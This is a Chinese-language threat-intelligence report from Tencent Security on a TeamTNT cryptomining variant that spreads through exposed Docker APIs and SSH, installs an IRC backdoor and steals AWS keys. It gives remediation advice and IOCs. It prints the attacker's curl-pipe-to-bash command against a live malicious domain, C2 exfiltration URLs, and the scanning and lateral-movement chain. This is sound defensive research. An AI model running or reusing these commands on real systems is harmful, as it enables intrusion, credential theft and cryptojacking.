威胁研究正文

腾讯安全截获TeamTNT挖矿木马最新变种,失陷主机被安装IRC后门,攻击者可实现任意目的

2021-01-14 09:27:12

腾讯安全威胁情报中心也监测到TeamTNT 变种利用IRC进行通信控制肉鸡服务器组建僵尸网络,此次使用的IRC 采用的是github开源的oragono,暂未检测到后门有执行拒绝服务(DoS)功能。除了利用肉鸡服务器挖矿,攻击者还可能利用已失陷的服务器横向传播,以攻占更多其他主机,得手后会在失陷主机安装IRC后门实现远程控制。

一、背景

腾讯安全威胁情报中心也监测到TeamTNT 变种利用IRC进行通信控制肉鸡服务器组建僵尸网络,此次使用的IRC 采用的是github开源的oragono,暂未检测到后门有执行拒绝服务(DoS)功能。趋势科技曾在12月18日发布的文章中提到TeamTNT在部署具有DoS功能的IRC Bot TNTbotinger。

本次攻击目前还只是检测到利用Docker remote api未授权访问漏洞进行攻击,再利用SSH攻击传播,再安装IRC后门。腾讯安全20201125日曾发布文章介绍TeamTNT挖矿家族利用Docker remote api未授权访问漏洞(https://mp.weixin.qq.com/s/Bw8_zNBwpL1eTZZ0dxXQQw)。显然,本次腾讯安全捕获的TeamTNT最新变种表明,该团伙控制僵尸网络的能力已得到提升,失陷服务器的风险或损失更大了。

该挖矿木马通过SSH复用连接进行横向移动感染,利用masscanzgrab对外扫描占用带宽。同时挖矿木马会占用大量CPU资源进行计算,可能导致业务系统崩溃。除了利用肉鸡服务器挖矿牟利,攻击者还可能利用已失陷的服务器继续横向传播,以攻占更多其他主机,得手后会在失陷主机安装IRC后门实现远程控制,包括:随时可能利用已控制的服务器集群对指定目标发起DDoS攻击、窃取服务器资料等等。

腾讯安全专家建议企业用户按照以下步骤进行自查以及处置,以确认是否被此蠕虫感染,如有删除相关进程文件及定时任务:

1. Docker Remote API2375 非必要情况不要暴露在公网,如必须暴露公网 ,则需要配置正确的访问控制策略。

2.排查当前主机docker的容器,是否存在非正常容器,将其停止并删除。

3.停止xmrigMiner进程。

4.如非主动安装masscan/zgrab,将其卸载。

针对该病毒的最新动向,腾讯安全全系列产品均可检测防御。

具体响应清单如下:

应用

场景

安全产品

解决方案

腾讯T-Sec

威胁情报云查服务

SaaS

1TeamTNT挖矿木马相关IOCs已入库。

各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。可参考:https://cloud.tencent.com/product/tics

腾讯T-Sec

高级威胁追溯系统

1TeamTNT挖矿木马相关信息和情报已支持检索。

网管可通过威胁追溯系统,分析日志,进行线索研判、追溯网络入侵源头。T-Sec高级威胁追溯系统的更多信息,可参考:https://cloud.tencent.com/product/atts

云原生安全

防护

云防火墙

Cloud FirewallCFW

基于网络流量进行威胁检测与主动拦截,已支持:

1TeamTNT挖矿木马关联的IOCs已支持识别检测;

2)检测Docker Remote API未授权访问漏洞利用;

有关云防火墙的更多信息,可参考:
https://cloud.tencent.com/product/cfw

腾讯T-Sec  主机安全

Cloud Workload ProtectionCWP

1)已支持查杀TeamTNT挖矿木马程序;

2)支持检测Docker Remote API未授权访问漏洞利用;

腾讯主机安全(云镜)提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关于T-Sec主机安全的更多信息,可参考:https://cloud.tencent.com/product/cwp

腾讯T-Sec 安全运营中心

基于客户云端安全数据和腾讯安全大数据的云安全运营平台。已接入腾讯主机安全(云镜)、腾讯御知等产品数据导入,为客户提供漏洞情报、威胁发现、事件处置、基线合规、及泄漏监测、风险可视等能力。

关于腾讯T-Sec安全运营中心的更多信息,可参考:https://s.tencent.com/product/soc/index.html

非云企业安全防护

腾讯T-Sec

高级威胁检测系统

(腾讯御界)

1)已支持通过协议检测TeamTNT挖矿木马与服务器的网络通信

2)支持检测Docker Remote API未授权访问漏洞利用;

关于T-Sec高级威胁检测系统的更多信息,可参考:

https://cloud.tencent.com/product/nta

二、详细分析

直接利用Docker Remote API未授权访问漏洞执行命令

curl -Ls http://the.borg.wtf/outgoing/script_files/lm_ssh.assi | bash

下载lm_ssh.assi脚本

Lm_ssh.assi脚本是具有完整功能的挖矿脚本,主要有以下几个功能:

Localgo函数,利用ssh进行横向移动,登录ssh后下载lm_ssh.assi脚本。


下载核心挖矿组件:


需要用xmrigDaemon 加载xmrigMiner进行挖矿,通过远程下载的方式同时会将矿池的配置信息下载回来。

下载地址是:https://projectbluebeam.anondns.net /client/getConfig?clientId=VM-48-37-centos


同时会将当前系统的运行状态和配置等信息回传到服务器

回传地址是:https://projectbluebeam.anondns.net/client/setClientStatus?clientId=VM-48-37-centos


其中HaXXoR命名为kernel,在趋势科技的报告中提到命名为kube的二进制文件是Go编译的,并且包含AES加密的ELF文件。这是在执行过程中动态加载的,并且使用了与LaufzeitCrypterGo版本相同的打包程序。AES密钥和初始化向量(IV)硬编码在二进制文件中。这个版本中任然使用了相同的打包程序,


加载代码也与之前发布的一样

 

但此次加载的IRCgithub开源的oragono,版本为最新的2.4.0


从返回的信息上可以看出当前这个IRC服务器上有220client在线,有17个频道。

通过分析该IRC服务器没有采用密码等,只需要nick name即可登录。通过返回信息可以看出该服务器创立于2021.01.09 00:00:46,当前有197client在线,15个频道。


频道信息


可以查询用户的相关信息能够看出其所在的频道和链接时间:


IRC可以通过控制端对注册的client下发command,但目前通过流量上看,暂时未发现产生了其他指令,目前服务器的client都属于idle状态。

在执行完下载任务后,继续执行信息收集,主要收集的主机上的aws相关信息,如secret_key,asscess_key_id,然后将其回传至服务器。


然后执行下载安装masscan.


在安装完masscan后,通过执行ip route show获取其内网网段后,利用masscan对内网的22端口进行扫描,在扫描结束后在调用loaclgo进行横向移动去执行下载命令。

还会利用漏洞直接执行命令下载docker.assi的脚本,该脚本首先执行下载安装masscan,jq,zgrabmasscan/zgrab都是扫描器,jqjson处理工具。


下载安装完扫描工具后,利用工具扫描全网开放了2379,2376,4683端口的主机


在将开放2379端口的IP回传至服务器。

IOCs

IP

45.9.148.35

45.9.150.36

45.9.148.108


Domain

the.borg.wtf

irc.borg.wtf

projectbluebeam.anondns.net


C&C

hxxps://projectbluebeam.anondns.net


Md5

masscan.assi

c49bc0dd9ffdb733e4bdc08b7dd86f7c

docker.assi

6a8a351eb2689c98f0bf555ef40c8576

lm_ssh.assi

18fb92e5761a0fbc3d9851e13ea7a051

aws.sh

0462ea0efbe86b2347bae553ea8107f0

aws2.sh

4aa866946c85283ee433a465e84a2a08

xmrigMiner

769a36672cb4f421be3d3f717107eb3f

xmrigDaemon

15ef5bc64545fcb21b168697a1314cf1

      

URL

hxxp://the.borg.wtf/outgoing/binary_files/HaXXoR
hxxp://the.borg.wtf/outgoing/binary_files/xmrigMiner
hxxp://the.borg.wtf/outgoing/binary_files/xmrigDaemon
hxxp://the.borg.wtf/outgoing/script_files/lm_ssh.assi
hxxp://the.borg.wtf/outgoing/script_files/scanner/docker.assi
hxxp://the.borg.wtf/outgoing/script_files/setup/masscan.assi
hxxp://borg.wtf/aws2.sh
hxxp://the.borg.wtf/d.sh
hxxp://the.borg.wtf/outgoing/script_files/setup/zgrab.assi
hxxp://borg.wtf/aws.sh


钱包:

85Cp3KPSKiMfosyXpEbiqhJvXTYWUnTBYcdBuP9TbiGi9BSwYW3oP6Kj5xxwJsExitWxh4xY4xxPaC57ww9q6se7D6vBVam


矿池地址:

34.252.195.254: 10128

参考链接:

https://www.trendmicro.com/en_us/research/20/l/teamtnt-now-deploying-ddos-capable-irc-bot-tntbotinger.html

https://cybersecurity.att.com/blogs/labs-research/malware-using-new-ezuri-memory-loader

https://s.tencent.com/research/report/1185.html

扫描以下二维码关注“腾讯安全威胁情报中心”公众号,掌握最新的网络安全威胁情报。

在线咨询